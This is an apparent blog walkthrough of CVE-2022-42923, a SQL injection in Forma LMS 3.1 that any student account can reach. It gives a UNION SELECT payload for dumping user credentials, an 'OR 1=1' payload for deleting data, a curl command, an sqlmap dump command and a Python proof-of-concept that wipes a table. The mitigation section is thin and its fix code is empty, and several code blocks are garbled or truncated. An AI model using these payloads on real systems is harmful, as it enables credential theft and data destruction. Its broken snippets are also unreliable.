CVE-2022-42923 - Forma LMS 3.1. and Earlier – SQL Injection Exploit Walkthrough

Forma LMS is a popular open-source Learning Management System. But like many web applications, it has had its fair share of vulnerabilities. One significant issue affecting version 3.1. and earlier is CVE-2022-42923, an authenticated SQL injection. Even students can exploit this to get sensitive data or wipe important tables.

In this article, we’ll break down how this hole works, examine the affected code, and walk you through a proof-of-concept exploit. This is original, actionable info that’ll help blue and red teams alike.

The flaw sits in appCore/index.php when handling requests to the route

?r=adm/mediagallery/delete

The vulnerable parameter is id. If you’re logged in as a student, you can send a request like:

POST /appCore/index.php?r=adm/mediagallery/delete&id=3

But the app doesn’t sanitize the id parameter before putting it into a database query. So an attacker can send a payload like:

id=3 OR 1=1

…and force the backend to run harmful or revealing SQL.

Here’s a simplified sample of vulnerable PHP code (from adm/mediagallery/delete)

$id = $_REQUEST['id']; // No filtering or type checking

$sql = "DELETE FROM core_user_file WHERE id=$id";
$db->exec($sql); // Dangerous!

Notice how $id is passed straight from user input to SQL without sanitizing. If id=3 it runs fine. If id=3 OR 1=1, it deletes every row.

You need a student account on the Forma LMS instance (no admin needed)

- Access to the endpoint /appCore/index.php?r=adm/mediagallery/delete

id=3 UNION SELECT 1,username,password,email FROM core_user -- -

- Delete all files:
  

bash

id= OR 1=1

### 3. How to Exploit

You can send an HTTP request using curl or Burp Suite. Here’s a simple curl example to delete all user files:

bash
curl -X POST \

b "PHPSESSID=" \

https://yourformalms.com/appCore/index.php?r=adm/mediagallery/delete

Replace <your session id here> with your student session token.

You can also automate dumping the database with SQLMap (if error messages leak data):

bash
sqlmap -u "https://yourformalms.com/appCore/index.php?r=adm/mediagallery/delete&id=3" \

cookie="PHPSESSID=" --batch --dump

---

## Proof-of-Concept Code Snippet

Here’s a quick Python3 PoC for table wiping:

python
import requests

url = "https://yourformalms.com/appCore/index.php?r=adm/mediagallery/delete"
cookies = {'PHPSESSID': ''}
data = {'id': ' OR 1=1'}

r = requests.post(url, data=data, cookies=cookies)
print("Status code:", r.status_code)
print("Response:", r.text)

This will wipe all entries in the core_user_file table if you’re logged in as a student.

---

## Mitigation Steps

How Do I Fix This?
- Upgrade to a patched version of Forma LMS (Check their downloads page).
- If you must patch urgently, sanitize input:

    

php

References

- Forma LMS official site
- Exploit details on GitHub
- CVE-2022-42923 at NVD


Conclusion:
SQL injection isn’t dead — it keeps popping up in new and widely-used apps like Forma LMS. CVE-2022-42923 is dangerous because any student can exploit it and cause serious damage. Patching and basic input validation are the only way to stay safe.

Timeline

Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/01/2022 20:06:00 UTC